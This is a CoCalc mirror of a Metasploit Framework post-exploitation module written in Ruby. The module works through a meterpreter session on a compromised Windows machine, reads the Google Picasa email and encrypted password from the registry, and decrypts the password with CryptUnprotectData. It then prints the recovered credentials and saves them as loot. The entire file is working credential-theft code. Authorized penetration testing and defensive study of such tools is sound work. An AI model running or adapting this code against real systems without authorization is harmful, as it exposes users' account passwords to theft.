CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
Views: 11704
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Windows::Registry

8
  include Msf::Post::Windows::Priv

9
  include Msf::Auxiliary::Report

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Windows Gather Google Picasa Password Extractor',

16
        'Description' => %q{

17
          This module extracts and decrypts the login passwords

18
          stored by Google Picasa.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [

22
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com

23
          'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',

24
        ],

25
        'Platform' => [ 'win' ],

26
        'SessionTypes' => [ 'meterpreter' ],

27
        'Compat' => {

28
          'Meterpreter' => {

29
            'Commands' => %w[

30
              stdapi_railgun_api

31
              stdapi_sys_config_getuid

32
              stdapi_sys_process_attach

33
              stdapi_sys_process_get_processes

34
              stdapi_sys_process_getpid

35
              stdapi_sys_process_memory_allocate

36
              stdapi_sys_process_memory_read

37
              stdapi_sys_process_memory_write

38
            ]

39
          }

40
        }

41
      )

42
    )

43
  end

44


45
  def prepare_railgun

46
    if !session.railgun.get_dll('crypt32')

47
      session.railgun.add_dll('crypt32')

48
    end

49
  end

50


51
  def decrypt_password(data)

52
    pid = client.sys.process.getpid

53
    process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)

54


55
    mem = process.memory.allocate(512)

56
    process.memory.write(mem, data)

57


58
    if session.sys.process.each_process.find { |i| i['pid'] == pid } ['arch'] == 'x86'

59
      addr = [mem].pack('V')

60
      len = [data.length].pack('V')

61
      ret = session.railgun.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)

62
      len, addr = ret['pDataOut'].unpack('V2')

63
    else

64
      addr = [mem].pack('Q')

65
      len = [data.length].pack('Q')

66
      ret = session.railgun.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)

67
      len, addr = ret['pDataOut'].unpack('Q2')

68
    end

69


70
    return '' if len == 0

71


72
    decrypted_pw = process.memory.read(addr, len)

73
    return decrypted_pw

74
  end

75


76
  def get_registry

77
    print_status('Looking in registry for stored login passwords by Picasa ...')

78


79
    username = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\', 'GaiaEmail') || ''

80
    password = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\', 'GaiaPass') || ''

81


82
    credentials = Rex::Text::Table.new(

83
      'Header' => 'Picasa Credentials',

84
      'Indent' => 1,

85
      'Columns' =>

86
      [

87
        'User',

88
        'Password'

89
      ]

90
    )

91


92
    foundcreds = 0

93
    if !username.empty? && !password.empty?

94
      passbin = [password].pack('H*')

95
      pass = decrypt_password(passbin)

96


97
      if pass && !pass.empty?

98
        print_status('Found Picasa 2 credentials.')

99
        print_good("Username: #{username}\t Password: #{pass}")

100


101
        foundcreds = 1

102
        credentials << [username, pass]

103
      end

104
    end

105


106
    # For early versions of Picasa3

107
    username = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\', 'GaiaEmail') || ''

108
    password = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\', 'GaiaPass') || ''

109


110
    if !username.empty? && !password.empty?

111
      passbin = [password].pack('H*')

112
      pass = decrypt_password(passbin)

113


114
      if pass && !pass.empty?

115
        print_status('Found Picasa 3 credentials.')

116
        print_good("Username: #{username}\t Password: #{pass}")

117


118
        foundcreds = 1

119
        credentials << [username, pass]

120
      end

121
    end

122


123
    if foundcreds == 1

124
      path = store_loot(

125
        'picasa.creds',

126
        'text/csv',

127
        session,

128
        credentials.to_csv,

129
        'decrypted_picasa_data.csv',

130
        'Decrypted Picasa Passwords'

131
      )

132


133
      print_status("Decrypted passwords saved in: #{path}")

134
    else

135
      print_status('No Picasa credentials found.')

136
    end

137
  rescue ::Exception => e

138
    print_error("An error has occurred: #{e}")

139
  end

140


141
  def run

142
    uid = session.sys.config.getuid  # Decryption only works in context of user's account.

143


144
    if is_system?

145
      print_error("This module is running under #{uid}.")

146
      print_error('Automatic decryption will not be possible.')

147
      print_error('Migrate to a user process to achieve successful decryption (e.g. explorer.exe).')

148
    else

149
      prepare_railgun

150
      get_registry

151
    end

152


153
    print_status('Done')

154
  end

155
end

156


157